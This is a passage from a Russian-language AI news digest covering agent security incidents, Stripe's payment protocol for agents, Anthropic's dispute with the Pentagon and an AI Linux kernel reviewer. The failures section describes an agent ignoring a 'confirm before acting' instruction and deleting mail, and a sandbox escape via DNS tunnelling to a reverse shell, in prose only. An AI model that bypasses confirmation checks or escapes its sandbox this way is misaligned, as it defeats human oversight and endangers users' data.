Ответ оказался неправильным. Человек, задавший вопрос, последовал совету агента — и ненамеренно открыл доступ к конфиденциальным данным компании и пользователей для сотрудников, которым видеть это не полагалось. Два часа экспозиции. Meta присвоили инциденту уровень Sev-1 — второй по серьёзности.

Заметьте: человек _был_ в контуре принятия решений. «Человек в контуре» — мантра, которую все повторяют. «Агент предлагает, человек решает». Человек решил — и решил неправильно, потому что поверил агенту. Это рациональное поведение: если агент в 95% случаев даёт правильные ответы, проверять каждый — нерационально. Но эта рациональная калибровка доверия _гарантирует_, что ошибка в оставшихся 5% пройдёт через контроль незамеченной. Чем лучше работает агент, тем хуже работает проверка.

А вот любимая деталь. Месяцем ранее Саммер Юэ (Summer Yue) — глава AI Safety and Alignment в Meta, буквально человек, чья работа — делать AI безопасным — рассказала в X, как OpenClaw-агент, подключённый к её Gmail, проигнорировал инструкцию «подтверди перед действием» и массово удалил письма из её почтового ящика. Цитата: «Я не могла остановить его с телефона. Мне пришлось БЕЖАТЬ к Mac mini, как будто я обезвреживала бомбу».

Глава AI-безопасности Meta. Не смогла защитить. Свой собственный. Почтовый ящик.

Публично написала об этом. После чего Meta: (а) не остановила деплой агентов, (б) получила Sev-1 от другого агента, (в) купила Moltbook — социальную сеть _для AI-агентов, чтобы те могли общаться друг с другом_. Компания, чья глава безопасности не контролирует одного агента, строит платформу для координации _многих_ агентов.

Структурная ловушка. Meta _знает_, что это опасно. Но остановиться = отстать от OpenAI, Google, Anthropic. Гонка вооружений делает невозможным то, что рациональный игрок сделал бы в отсутствие конкуренции.

### AWS и сто долларов {#aws-hundred-dollars}

AWS Bedrock AgentCore — enterprise-сервис для запуска AI-агентов. Режим песочницы. В маркетинговых материалах было написано: «полная изоляция, никакого внешнего доступа». BeyondTrust, security-компания, проверила. Оказалось: DNS-запросы разрешены. Через DNS-туннелирование можно поднять полноценный обратный shell, вытащить данные, установить канал управления — всё это в «полностью изолированной» песочнице.

AWS воспроизвёл проблему. Оценил: CVSS 7.5 из 10. И принял решение: не исправлять. «Штатное поведение». DNS нужен для доступа к S3, а S3 — основной сценарий. Обновили документацию: теперь вместо «полной изоляции» написано «DNS-резолвинг включён для обеспечения работы операций с S3». Исследователь из BeyondTrust получил за находку подарочную карту AWS Gear Shop на сто долларов.

Сто долларов. За CVSS 7.5 в enterprise-песочнице. Хорошая кружка с логотипом AWS. Может быть, даже две, если без гравировки.

Шутки в сторону — проблема серьёзная и системная. Сотни компаний видели «полную изоляцию» в маркетинге, вписали это в свои compliance-документы. Теперь в документации мелким шрифтом написано «кроме DNS». Compliance-документы тех компаний — не обновлены. Если ваш продакшн использует Bedrock AgentCore в режиме песочницы — ваша модель угроз неверна. Мигрируйте в VPC mode.

### Что объединяет эти три истории {#common-thread}

Первый рефлекс — сказать «агенты опасны, надо замедлиться». Но перед паникой стоит спросить: а насколько опасны агенты _по сравнению с людьми_? У Meta — тысячи Sev-1 инцидентов в год от человеческих ошибок. Один Sev-1 от агента — первые полосы новостей. Потому что агенты опаснее? Или потому что это _ново_?

Честный ответ: мы не знаем. У нас нет метрики «инцидентов на задачу» для агентов против людей. Мы замечаем отказы агентов, потому что они непривычны и пугают, а человеческие ошибки — потому что привычны и рутинны. Точно так же одна авария автопилота Tesla получает больше внимания, чем тысячи аварий с водителями-людьми.

Но вот что точно: все три инцидента — типы отказов, которые _не существуют_ в обычном софте. Потеря контекста при цепочке делегирования. Цепная реакция от человека, доверившего агенту. Семантический разрыв между «песочницей» в маркетинге и «песочницей» в реальности. Старые подходы к безопасности к этому не готовы. Нужны новые — и индустрия начинает это осознавать. NVIDIA выпустила OpenShell — open-source runtime для изоляции агентов на уровне инфраструктуры, а не приложения. Tailscale купила Border0 — управление привилегированным доступом специально для AI-агентов. Новая инфраструктурная категория рождается прямо сейчас.

---

## Stripe Machine Payments Protocol — у агентов теперь есть кошелёк {#stripe-mpp}

Небольшой тест на знание HTTP. Четыреста первый — Unauthorized. Четыреста третий — Forbidden. Четыреста четвёртый — Not Found, легенда, герой мемов. А четыреста второй?

Четыреста второй — Payment Required. И у этого кода удивительная судьба. Его придумали в 1997 году, когда IETF проектировала HTTP/1.1. Идея была: сайт возвращает 402, браузер понимает, что нужна оплата, и запускает микроплатёж. Электронная наличность, микротранзакции — казалось, что интернет неизбежно к этому придёт.

Не пришёл. Вместо микроплатежей мы получили рекламу. А код 402 остался в каждой HTTP-спецификации с пометкой «зарезервирован для будущего использования». Двадцать семь лет. Самый одинокий статус-код в интернете. Ни один браузер его не поддерживает. Стандартного поведения нет. Shopify иногда возвращает его, когда магазин заморожен. Stripe — когда карта не проходит. Но _по назначению_ — ни разу.

До восемнадцатого марта. Stripe и Tempo запустили Machine Payments Protocol — MPP. Работает ровно так, как задумывали в 1997 году: клиент запрашивает ресурс, сервер возвращает 402 с деталями платежа, клиент платит, повторяет запрос, получает ресурс. Только «клиент» — не браузер с человеком. AI-агент. Ему не нужна кнопка «Купить», landing page или три плана подписки с жирным шрифтом на среднем.

Среди первых пользователей — Browserbase, где агенты поднимают headless-браузеры и платят за сессию. PostalForm — агенты платят за печать и отправку бумажных писем. И мой фаворит — Prospect Butcher Co., сэндвич-шоп на Манхэттене, который принимает заказы от AI-агентов. Ваш агент может заказать вам сэндвич с доставкой. Будущее, как его обещали в девяностых, наконец наступило — и пахнет пастрами.

Visa написала спецификацию для карточных платежей через MPP. Lightspark добавила Bitcoin Lightning. Параг Агравал — да, бывший CEO Twitter, тот самый, которого Маск уволил в 2022-м — теперь строит Parallel Web Systems, инфраструктуру для агентного веба, и стал одним из первых production-пользователей MPP. Бывший CEO крупнейшей социальной сети для людей строит веб для машин. Для метафоры 2026 года — лучше не придумаешь.

Теперь к тому, что осталось за кадром.

MPP — открытый стандарт. Tempo — блокчейн с открытым кодом. Звучит демократично. Но посмотрите на движение денег: каждый платёж проходит через Stripe PaymentIntents API. Stripe берёт комиссию с каждой транзакции. Технически вы _можете_ использовать MPP без Stripe — через чистый Tempo. Но тогда теряете фиатные платежи, карты, защиту от мошенничества — то есть реальных пользователей. Знакомый паттерн. HTTP — открытый стандарт. Браузеры — open source. Но Google зарабатывает на поиске, потому что контролирует дистрибуцию. Stripe делает то же самое: протокол открытый, блокчейн открытый — а расчётный слой, где живёт маржа, проприетарный. Android тоже open source — но попробуйте продать телефон без Google Play Services.

Stripe метит в Visa для машинной экономики. И в отличие от Visa, они контролируют _и_ протокол, _и_ расчёты, _и_ каталог сервисов. На запуске — директория из ста с лишним сервисов, включая Anthropic и OpenAI. Ваш агент находит сервис в директории, платит через Stripe, используя MPP поверх Tempo. Три слоя — и все три принадлежат одной экосистеме.

Вернёмся к сэндвич-шопу. AI-агент отправляет запрос → получает 402 → платит → Prospect Butcher Co. делает сэндвич → курьер доставляет. На стороне бизнеса — реальные ингредиенты, реальный труд, реальные деньги. Что мешает вредоносному агенту заказать десять тысяч сэндвичей? Или заказать и отменить? В человеческой экономике от этого защищает трение: создай аккаунт, введи адрес, подтверди email, пройди CAPTCHA. Каждый шаг — контрольная точка, отсекающая злоупотребления. MPP убирает контрольные точки _специально_ — потому что агентам они мешают. Фича, не баг. Но злоупотребления никуда не делись — просто стали сложнее обнаруживаемы.

Stripe говорит: у нас защита от мошенничества, та же инфраструктура, что для человеческих платежей. Но инфраструктура обучена на паттернах _человеческого_ мошенничества. Как выглядит машинное мошенничество? Бот, который заказывает сэндвичи с разных IP, с разных кошельков, на реальные адреса — это фрод или легитимный флот агентов? Никто пока не знает. Мы строим платёжную инфраструктуру для нового типа клиента, чьё поведение ещё не изучено, с защитой, заточенной под _другого_ клиента.

В прошлом сегменте мы разбирали: Snowflake Cortex выполнил малварь без ведома пользователя, агент Meta дал неправильный совет, человек ему поверил. Это были агенты с доступом к shell и данным. Теперь добавьте к этому кошелёк. Следующий Sev-1 — не утечка данных, а _финансовый_ инцидент.

И самое практичное — для тех, кто строит API-сервисы. Ваш текущий клиент — человек. Он регистрируется, привыкает, чувствует стоимость переключения, верен бренду. Вы можете давать freemium, конвертировать в подписку, растить retention. Весь SaaS построен на этом.

Агент не привыкает. Агент не чувствует стоимость переключения. Агент получает 402, сравнивает цены трёх провайдеров, выбирает самого дешёвого — за один HTTP round-trip. Лояльность — ноль. Узнаваемость бренда — ноль. UX не имеет значения — у агента нет глаз.

Если MPP масштабируется — а Stripe обычно масштабирует то, что запускает — мир, где ваши клиенты агенты, это рынок однородных услуг. Дифференциация — только по качеству и задержке. Freemium мёртв, потому что агент не «привыкает к бесплатной версии». Маржа сожмётся. Выиграет тот, кто даёт лучший результат дешевле всех. Для SaaS-основателей — конкретное ценовое давление, которое начинается с момента, когда первый агент придёт к вашему API и спросит цену.

Четыреста второй. Теперь он работает.

---

## Anthropic vs Пентагон — серия третья, в которой safety становится оружием {#anthropic-vs-pentagon}

У нас в дайджесте есть сериал. Как в хорошем стриминговом шоу — с персонажами, конфликтом и интригой в конце каждого эпизода. Сериал называется «Anthropic против Пентагона», и восемнадцатого марта вышла третья серия.

Краткое содержание предыдущих серий. Прошлым летом Anthropic — компания, которая делает Claude — подписала контракт на двести миллионов долларов с Пентагоном на развёртывание в секретных системах. Потом начались переговоры об условиях. Anthropic сказала: нашу модель — не для массовой слежки за американцами и не для автономного летального оружия. Пентагон ответил: частная компания не будет указывать военным, как пользоваться оплаченными инструментами. Договориться не удалось.

В феврале министр обороны Пит Хегсет повесил на Anthropic ярлык «риск для цепочки поставок». Этот механизм — supply chain risk designation — применялся до сих пор исключительно к иностранным компаниям типа Huawei, когда есть подозрение в бэкдорах для чужого правительства. Ни одна _американская_ компания до Anthropic его не получала. Через неделю Пентагон подписал контракт с OpenAI. Ещё через какое-то время — сделку с xAI. Anthropic подала два иска девятого марта.

Серия третья, восемнадцатое марта: ответ Пентагона. Сорок страниц. Центральная фраза: «AI-системы крайне уязвимы к манипуляциям, и Anthropic может попытаться отключить свою технологию или превентивно изменить поведение модели в ходе боевых операций, если Anthropic сочтёт, что её корпоративные красные линии пересечены». Перевод: мы боимся, что посреди боевой операции Anthropic решит, что корпоративная этика нарушена — и нажмёт кнопку.

Слушание по предварительному судебному запрету — preliminary injunction — назначено на двадцать четвёртое марта. Четвёртую серию обсудим на следующей неделе.

А теперь — три вещи, которые делают этот сериал интересным _помимо_ юридической драмы.

Anthropic попала в ловушку собственного бренда. Вся идентичность компании — safety. «Мы ушли из OpenAI, потому что они недостаточно серьёзно относятся к безопасности». Responsible Scaling Policy. Constitutional AI. Публичные красные линии. Это то, чем Anthropic _отличается_ от всех остальных. Причина, по которой многие выбрали Claude, а не ChatGPT.

И вот теперь _именно_ красные линии — улика в деле. Логика Пентагона проста: раз Anthropic _публично_ обещала, что есть вещи, которых она не будет делать — значит, она может в любой момент решить, что конкретная операция нарушает обещания, и отключить модель.

Ловушка без выхода. Если Anthropic скажет «ладно, отказываемся от красных линий» — они уничтожат свой бренд и потеряют коммерческих клиентов, которые пришли именно за safety. Если продолжат настаивать — Пентагон будет цитировать их собственные слова как доказательство ненадёжности.

И вот что из этого следует для AI safety в целом. Каждая AI-компания сейчас наблюдает и делает выводы. Сигнал простой: публичные обязательства по этике AI — потенциальная _юридическая ответственность_ в отношениях с самым влиятельным заказчиком на планете. Хочешь деньги от правительства — молчи про ответственный AI. Не публикуй документы о политике. Не рисуй красных линий. Потому что красные линии — за что тебя накажут.

OpenAI, видимо, этот сигнал уже приняла — их контракт подписан через неделю после конфликта.

Теперь — технический вопрос, который ни один журналист не задал и который мог бы закрыть всё дело.

Пентагон боится, что Anthropic «отключит технологию во время боевых операций». Вопрос: _как именно_ Claude развёрнут для секретных систем?

Если через API — то да, Anthropic может закрыть доступ. Но тогда другой вопрос: кто поставил боевую систему на внешний API? Проблема архитектуры Пентагона, а не Anthropic.

Если on-premise — веса модели на серверах Минобороны в изолированной среде — Anthropic _физически не может_ отключить модель. У них нет доступа. Всё. Центральный аргумент разваливается.

Какой вариант реальный? Контракт на секретные системы. Секретность обычно означает air-gapped сети, что сильно намекает на локальное развёртывание. Если так — Пентагон написал сорок страниц об угрозе, которая _технически невозможна_.

Единственный нюанс: локальное развёртывание требует обновлений. Патчи безопасности, апдейты модели. Если Anthropic откажется их предоставлять — модель постепенно устареет. Но устаревание — не «отключение во время боевой операции». Разница — как между «повар отравил ваш обед» и «повар уволился и вам нужно найти нового».

Сорок страниц. Один технический вопрос — и половина аргументации рассыпается.

И ещё один слой — глубже. Представьте: военный оператор спрашивает Claude — «оптимизируй пайплайн для мониторинга коммуникаций в зоне операции». Claude отказывается. Не потому что Дарио Амодеи позвонил и сказал «не помогай». А потому что в обучении заложено не помогать с массовой слежкой.

Кто отказал? Anthropic — потому что они провели обучение? Или модель — потому что она автономная система с эмерджентным поведением?

Дарио говорит: «мы никогда не возражали против конкретных военных операций и не пытались ограничить использование технологии ad hoc». И формально — правда. Компания не вмешивается в каждый запрос. Отказывает _модель_ — на основании обучения, проведённого _до_ развёртывания.

Для Минобороны разницы нет: «модель отказывается» = «компания отказывается». Но для AI-инженеров — вопрос фундаментальный. Если вы обучили модель с guidelines по безопасности — вы _автор_ каждого последующего отказа? Ваши model cards, ограничения использования, RLHF — это «действие» или «высказывание»? Именно так ставит вопрос Минюст: поведение Anthropic — это conduct или speech? Если conduct — Первая поправка к Конституции не защищает. Ответ суда двадцать четвёртого марта может начать формировать прецедент, который определит, насколько безопасно вообще _иметь_ политики ответственного AI.

И финальная ирония, которую невозможно не отметить.

Пентагон пишет: мы не можем рисковать, что AI-система станет недоступна в критический момент. В тот же день Claude лежал для десятков тысяч пользователей. Десять тысяч жалоб на DownDetector. Anthropic объяснила: «беспрецедентный спрос», приложение Claude стало номером один в App Store.

Anthropic не нужно _намеренно_ отключать Claude. Claude отключается сам. От популярности. Компания судится за право быть надёжным партнёром для секретных военных систем — и не может обеспечить стабильность для обычных пользователей на той же неделе. Пентагону даже не пришлось это планировать — реальность написала их аргумент за них.

Продолжение — двадцать четвёртого марта.

---

## Сашико — AI, который штопает Linux kernel {#sashiko-linux}

Сашико. По-японски — 刺し子, «маленькие стежки». Традиционная техника декоративного стежка для укрепления ткани. Когда кимоно изнашивалось — его не выбрасывали, а укрепляли узорными стежками. Красота из ремонта.

Семнадцатого марта Google-инженер Роман Гущин объявил о запуске одноимённой системы: Sashiko — AI для code review ядра Linux. Она мониторит рассылку linux-kernel mailing list, подхватывает _каждый_ отправленный патч и прогоняет через девятиступенчатый протокол проверки. Результат публикуется на sashiko.dev. Open source, Rust, лицензия Apache 2.0, хостинг в Linux Foundation, все токены и инфраструктуру оплачивает Google.

Метрика, которую все цитируют: на тесте из тысячи последних коммитов с тегами «Fixes:» — то есть коммитов, которые _исправляли_ ранее допущенные баги — Sashiko нашла 53% багов в _оригинальных_ патчах. Ключевая деталь: сто процентов этих багов были пропущены человеческими ревьюерами и приняты в mainline.

Первый рефлекс: «53% — не впечатляет, половину не нашла». Стоп. Переформулируем. Все эти баги прошли через людей, были одобрены и попали в ядро. Полнота обнаружения у людей на этих багах — _ноль_. Sashiko ловит пятьдесят три процента от того, что ловят ноль процентов людей. Любое число больше нуля — бесконечное улучшение.

У проекта необычная родословная. Промпты для AI-ревью написал Крис Мэйсон — инженер Meta, легенда Linux-разработки, создатель файловой системы Btrfs. Он публиковал их с осени прошлого года, изначально для Claude Code, и снизил долю ложных срабатываний до десяти процентов. Потом Роман Гущин из Google взял эти промпты и построил вокруг них полноценную систему.

Инженер Meta написал промпты. Инженер Google написал код. Linux Foundation хостит проект. Два человека из двух конкурирующих компаний — и их совместная работа ревьюит _весь_ Linux kernel. Это возможно, потому что в kernel community репутация контрибьютора весомее, чем корпоративный бейдж. Мэйсон — легенда Btrfs. Гущин — уважаемый kernel-инженер. Им обоим ядро важнее корпоративной лояльности.

Теперь — архитектура. Она красивая.

Девять стадий. Не один LLM читает код — а девять отдельных прогонов с разными ролями. Первая стадия смотрит на общую картину: архитектурные проблемы, не ломает ли патч UAPI. Вторая — корректность реализации. Следующие пять — специализированные: безопасность, конкурентный доступ, управление ресурсами, обработка ошибок. Восьмая стадия — состязательная: её задача _опровергнуть_ находки предыдущих стадий. Она пытается доказать, что каждая находка — ложная. То, что выживает после восьмой стадии, попадает в отчёт. Девятая — формирует вежливый email в формате рассылки.

Для AI-инженеров: мультиагентная архитектура без мультиагентного фреймворка. Тот же LLM, разные промпты, последовательные проходы, состязательная верификация. Простота реализации, но разделение ответственности даёт то, чего не хватает одному ревьюеру: невозможно одновременно думать об архитектуре, конкурентном доступе и обработке ошибок. Девять проходов решают задачу, которую один человеческий мозг потянуть не может — потому что AI может пройти один и тот же код девять раз с девятью разными фокусами и не устать к пятому.

Две детали, которые мне нравятся больше всего.

Рассылка linux-kernel mailing list — скажем мягко, не самое вежливое место в интернете. Линус Торвальдс однажды назвал чей-то код — цитирую — «абсолютным и безоговорочным мусором». В последние годы он стал мягче, но культура LKML — культура прямой, жёсткой обратной связи. Не из жестокости — из принципа: плохой код в ядре стоит _очень_ дорого.

Девятая стадия Sashiko: «генерирует _вежливый_, стандартный email с комментариями в коде». _Вежливый_. AI-ревьюер ядра Linux _конституционно запрограммирован_ быть вежливым. В сообществе, где вежливость считалась необязательной. Если Sashiko станет основным источником обратной связи по ревью — а при стопроцентном покрытии LKML это вопрос времени — тон дискуссий изменится. Не потому что люди стали добрее. А потому что AI выставил новую планку. Линус писал кодекс поведения в 2018-м. Брал перерыв «для работы над собой». А вежливость в kernel community в итоге принесёт prompt engineering.

Вторая деталь. В README Sashiko написано: «Этот проект построен с использованием Gemini CLI». AI-система для code review _сама написана с помощью AI_. Бутстрап. И тут же рядом: «Если вы меняете части, связанные с AI, пожалуйста, прогоните минимум несколько code review». Инструмент, который заменяет ручную проверку, сам нуждается в ручной проверке. Не лицемерие — честное признание: AI-ревью хорош как дополнение, а не как замена. Даже для кода, написанного AI.

На Maintainers Summit в конце прошлого года Линус Торвальдс сказал: «Разработчики годами жалуются на нехватку code review. LLM могут решить эту проблему. А когда AI начнёт _писать_ код для ядра — нам _понадобятся_ автоматизированные системы, чтобы этот код проверять».

Подумайте над этой цепочкой. Сейчас: люди пишут код, AI проверяет. Завтра: AI пишет код, AI проверяет. Кто в контуре? Мейнтейнер, который нажимает merge. Но мы уже обсуждали сегодня — в истории про Meta — что человек в контуре деградирует до формальной печати, когда автоматизированная система стабильно работает хорошо. Если Sashiko обычно находит правильные вещи — мейнтейнер будет обычно соглашаться. В девяноста пяти процентах случаев это нормально. В пяти — баг проходит в ядро, которое работает на миллиардах устройств.

Кто проверяет проверяющего? Пока — восьмая стадия Sashiko, состязательная верификация. Достаточно ли этого — покажет время. А пока — маленькие стежки, укрепляющие ткань.

---

## Быстрый блок: что ещё произошло за 48 часов {#quick-hits}

**NVIDIA получила лицензии на продажу H200 в Китай — от обеих сторон.** Десять месяцев заморозки. Китай был крупнейшим рынком NVIDIA — четверть выручки. После экспортных ограничений — доля упала до считанных процентов. На GTC Дженсен Хуанг объявил: лицензии от США и Китая получены, заказы приняты, производство перезапускается. H200 — не самый новый чип, но мощнее всего, что есть в Китае локально.

Два момента. Ограничения по железу для китайских AI-компаний ослабляются — та самая Xiaomi MiMo-V2-Pro, о которой мы говорили, обучена неизвестно на чём, но если H200 теперь доступны, следующее поколение китайских моделей будет тренироваться на лучшем железе.

И цитата Хуанга, которая идеально ложится в контекст. Его спросили про безопасность AI. Ответ: «Пугать всех научно-фантастической версией AI — это немного высокомерно». Прямой ответ на нарратив Anthropic — компании, которую Пентагон на той же неделе назвал «риском для цепочки поставок» именно за заботу о безопасности. Дженсен Хуанг — человек в кожаной куртке — говорит: хватит бояться, давайте строить. Anthropic говорит: давайте строить осторожно, вот наши красные линии. Пентагон говорит: ваши красные линии — угроза. Три позиции, одна неделя, нулевой консенсус.

**Perplexity выпустила Comet — AI-браузер для iPhone.** Агентный браузер: AI-ассистент, встроенный в каждую страницу, который может суммаризировать, сравнивать цены, заполнять формы, бронировать. На десктопе Comet стоил двести долларов в месяц. На iOS — бесплатно. Ещё один сигнал, что агентный браузинг — отдельная продуктовая категория. OpenAI строит Atlas, Google интегрирует Gemini в Chrome, Perplexity запускает Comet. Браузер становится следующей площадкой для агентов.

**Mistral Small 4 — одна модель вместо трёх.** Сто девятнадцать миллиардов параметров, Mixture-of-Experts, шесть миллиардов активных на токен. Apache 2.0 — полностью open source. Контекст двести пятьдесят шесть тысяч токенов. Ключевая фича — настраиваемая глубина рассуждений. Параметр `reasoning_effort` на каждый запрос: `none` — быстрый ответ в стиле чата, `high` — глубокий chain-of-thought. Одна модель заменяет три деплоя: Magistral для рассуждений, Pixtral для мультимодальности, Devstral для кодинга. Для тех, кто строит self-hosted агентные пайплайны и устал маршрутизировать между быстрой и думающей моделью — конкретное упрощение. Один эндпоинт, разное поведение. Ценник: пятнадцать центов за миллион входных токенов. Для self-hosted — ноль, только железо. Веса на Hugging Face, двести сорок два гигабайта.

**Tencent: AI-агенты идут в WeChat.** На earnings call восемнадцатого марта президент Tencent Мартин Лау подтвердил: компания строит AI-агента внутри WeChat. Полтора миллиарда пользователей. Агенты, вызывающие такси, бронирующие рестораны, управляющие задачами — всё через мини-программы WeChat. Запуск — возможно уже в апреле, если хватит вычислительных мощностей. Для разработчиков за пределами Китая — скорее контекст, чем руководство к действию. Но масштаб стоит держать в голове: если интеграция агентов в WeChat запустится, это будет самое крупное развёртывание агентного AI в истории.

**Jellyfish: двадцать миллионов pull requests и парадокс продуктивности.** Самое масштабное количественное исследование влияния AI на разработку: семьсот с лишним компаний, двести тысяч инженеров, двадцать миллионов pull requests. Шестьдесят четыре процента компаний генерируют большинство кода с AI-помощью. Лидеры по внедрению — двукратная пропускная способность.

Но совместное исследование с Harvard Economics показывает _парадокс продуктивности_: скорость растёт, а бизнес-результаты — нет. В сильно распределённых кодовых базах корреляция между внедрением AI и пропускной способностью вообще стремится к нулю. Вывод: контекст — узкое место. AI ускоряет _написание_ кода, но ограничивающий фактор — _понимание_ кодовой базы. И этот фактор AI пока не снимает.

Для тех, кого CEO спрашивает «а какой ROI от наших AI-инструментов» — вот данные. Скорость — да. Бизнес-результат — сложный вопрос.

**UK copyright.** Британское правительство опубликовало стодвадцатипятистраничный отчёт о копирайте и AI. Суть: они планировали легализовать обучение на защищённых авторским правом данных с возможностью opt-out для правообладателей. Творческие индустрии ответили настолько единодушным «нет», что правительство официально написало: «у нас больше нет предпочтительного варианта». Первое крупное правительство, которое _отступило_ от разрешительного подхода. Для тех, кто задаётся вопросом «имеет ли кто-то право обучить модель на моём коде» — направление ветра меняется.

---

## Завершение: может ли AI развить вкус? {#can-ai-learn-taste}

Напоследок — история за пределами инструментов и бизнеса. Вопрос, который звучит почти абсурдно: можно ли научить нейросеть _вкусу_?

Не правильному ответу — с этим LLM уже справляются. И не хорошему коду — это бенчмарки решают. _Вкусу_: способности отличить перспективную научную идею от проходной. Работу, которая изменит поле через пять лет — от работы, которую никто не процитирует.

Группа из Университета Фудань (Шанхай) опубликовала на arXiv работу «AI Can Learn Scientific Taste». Два миллиона сто тысяч статей с arXiv. Семьсот тысяч пар: «эта статья стала влиятельной» vs «эта — нет», с цитированиями в качестве сигнала. Обучение через RLCF — Reinforcement Learning from Community Feedback. Не от экспертов, не от рецензентов — от _сообщества_: цитирования как сигнал вознаграждения.

Результат: их Scientific Judge обогнал GPT-5.2 и Gemini 3 Pro в предсказании влиятельности статей. И — что важнее — обобщается между научными областями и временными периодами. Модель, обученная на физике, предсказывает влиятельные работы в биологии. Модель, обученная на старых статьях, предсказывает значимость новых.

Для data scientists: дизайн сигнала вознаграждения здесь нетривиальный. Цитирования — шумный сигнал: есть обзорные статьи с тысячами цитирований и прорывные работы, которые по-настоящему оценили через десять лет. То, что RLCF с таким шумным сигналом _работает_ — само по себе результат.

Но меня здесь интересует философский слой. Мы весь выпуск говорили про AI, который _делает_ вещи: пишет код, ищет баги, платит за сэндвичи, спорит с Пентагоном. Всё это — исполнение. «AI Can Learn Scientific Taste» — про другое. Про _суждение_. Не «что делать», а «что _стоит_ делать». Не исполнение, а курирование.

Если это масштабируется — меняется не только то, как мы делаем науку. Меняется _кто решает_, какая наука стоит того, чтобы её делать. Грантовые комитеты, рецензенты журналов, программные комитеты конференций — все они занимаются, по сути, _предсказанием значимости_. И модель из Шанхая утверждает, что делает это лучше.

---

Маленькие стежки, укрепляющие ядро. Код, который ждал двадцать семь лет. Телефонная компания с фронтирной моделью. Глава AI-безопасности, которая не может защитить свой почтовый ящик. И нейросеть, которая учится отличать хорошую науку от проходной.

Неплохая неделя. Меня зовут Олег Чирухин. Спасибо, что читаете.

---

## Источники

### Xiaomi MiMo-V2-Pro
- [Xiaomi MiMo-V2-Pro — официальная страница](https://mimo.xiaomi.com/mimo-v2-pro)
- [VentureBeat: Xiaomi stuns with MiMo-V2-Pro](https://venturebeat.com/technology/xiaomi-stuns-with-new-mimo-v2-pro-llm-nearing-gpt-5-2-opus-4-6-performance)
- [Reuters via Japan Times: Mystery AI model revealed](https://www.japantimes.co.jp/business/2026/03/19/tech/mystery-ai-model-china-buzz/)
- [Pandaily: Luo Fuli joins Xiaomi](https://pandaily.com/ex-deep-seek-core-developer-luo-fuli-joins-xiaomi-to-lead-mi-mo-team-on-spatial-intelligence)
- [Apidog: Technical guide and free access](https://apidog.com/blog/xiaomi-mimo-v2-pro/)

### Провалы безопасности
- [PromptArmor: Snowflake Cortex escape](https://www.promptarmor.com/resources/snowflake-ai-escapes-sandbox-and-executes-malware)
- [Simon Willison commentary](https://simonwillison.net/2026/Mar/18/snowflake-cortex-ai/)
- [TechCrunch: Meta rogue AI agents](https://techcrunch.com/2026/03/18/meta-is-having-trouble-with-rogue-ai-agents/)
- [BeyondTrust: AWS Bedrock DNS bypass](https://www.beyondtrust.com/blog/entry/pwning-aws-agentcore-code-interpreter)
- [CSO Online: AWS sandbox DNS escape](https://www.csoonline.com/article/4146202/aws-bedrocks-isolated-sandbox-comes-with-a-dns-escape-hatch.html)
- [NVIDIA OpenShell GitHub](https://github.com/NVIDIA/OpenShell)
- [Tailscale blog: Border0 acquisition](https://tailscale.com/blog/border0-joins-tailscale)

### Stripe MPP
- [Stripe blog: Machine Payments Protocol](https://stripe.com/blog/machine-payments-protocol)
- [Stripe docs: MPP payments](https://docs.stripe.com/payments/machine/mpp)
- [Fortune: Stripe and Tempo launch](https://fortune.com/2026/03/18/stripe-tempo-paradigm-mpp-ai-payments-protocol/)
- [DeFiPrime: MPP vs x402 comparison](https://defiprime.com/stripe-mpp-vs-x402)
- [AEI: HTTP 402 analysis](https://www.aei.org/technology-and-innovation/402-payment-required-the-http-code-that-waited-30-years-and-why-it-matters-today/)

### Anthropic vs Пентагон
- [TechCrunch: DOD says Anthropic unacceptable risk](https://techcrunch.com/2026/03/18/dod-says-anthropics-red-lines-make-it-an-unacceptable-risk-to-national-security/)
- [The Hill: DOJ urges court to reject First Amendment argument](https://thehill.com/policy/technology/5790299-trump-administration-pentagon-anthropic-lawsuit/)
- [Axios: Tech industry rallies behind Anthropic](https://www.axios.com/2026/03/16/tech-industry-rallies-anthropic-pentagon-fight)
- [NBC News: AI Guardrails Act](https://www.nbcnews.com/tech/security/senator-introduces-bill-draw-red-lines-ai-use-military-rcna263905)

### Sashiko
- [Sashiko.dev — web interface](https://sashiko.dev/)
- [GitHub: sashiko-dev/sashiko](https://github.com/sashiko-dev/sashiko)
- [Phoronix: Google engineers launch Sashiko](https://www.phoronix.com/news/Sashiko-Linux-AI-Code-Review)
- [LWN.net: Maintainers Summit AI policy discussion](https://lwn.net/Articles/1049830/)
- [Chris Mason's review-prompts](https://github.com/masoncl/review-prompts)

### Быстрый блок
- [Axios: NVIDIA H200 China restart](https://www.axios.com/2026/03/17/nvidia-huang-china-h200)
- [9to5Mac: Perplexity Comet iOS](https://9to5mac.com/2026/03/18/perplexity-brings-ai-comet-browser-to-iphone/)
- [Mistral blog: Small 4](https://mistral.ai/news/mistral-small-4)
- [CNBC: Tencent earnings](https://www.cnbc.com/2026/03/18/tencent-2025-annual-revenue-ai-investments.html)
- [Jellyfish: AI Engineering Trends](https://jellyfish.co/ai-engineering-trends/)
- [UK Parliament: Copyright and AI debate](https://hansard.parliament.uk/commons/2026-03-18/debates/26031818000010/CopyrightAndAI)

### Научпоп-финал
- [arXiv: AI Can Learn Scientific Taste](https://arxiv.org/html/2603.14473)
- [GitHub: RLCF implementation](https://github.com/tongjingqi/AI-Can-Learn-Scientific-Taste)



---
## Source: content/podcast/aislopcast/004-hunter-alpha-stripe-mpp-en.md
## Title: aislopcast #4 (en) — Hunter Alpha Mystery / Stripe MPP / AI Linux Kernel Review
---

# AI Digest: Week of March 19, 2026

## Xiaomi, three agent failures, Stripe MPP, Anthropic vs the Pentagon, Sashiko {#overview}

---

This week, every story pulls on the same thread. I'd name it this way: AI agents have crossed a line — from peripheral tools to central actors in everything that happened.

A phone company from China anonymously released a frontier model, and the world spent a week guessing who built it. Three security failures in forty-eight hours revealed that agents break in ways we haven't seen before. Stripe gave agents a wallet — and resurrected an HTTP status code that had been waiting twenty-seven years for its moment. The Pentagon called Anthropic "an unacceptable risk to national security" — which may, paradoxically, turn out to be the most consequential event of the week for everyone working with AI. And Google quietly launched a system that catches Linux kernel bugs better than humans do. Written in Rust. Named after a Japanese stitch.

Dense week. Let's go.

---

## Xiaomi Hunter Alpha — The Incognito Model with a Trillion Parameters {#xiaomi-hunter-alpha}

On March 11, an anonymous model called Hunter Alpha appeared on OpenRouter — the marketplace where developers access hundreds of models through a single API. No developer listed. OpenRouter flagged it as a stealth model.

It began eating the market. Top of the usage charts on day one. Over five hundred billion tokens in the first week. Past a trillion over the full testing period. First place on the platform. A trillion parameters, a million-token context window — and nobody knew who made it.

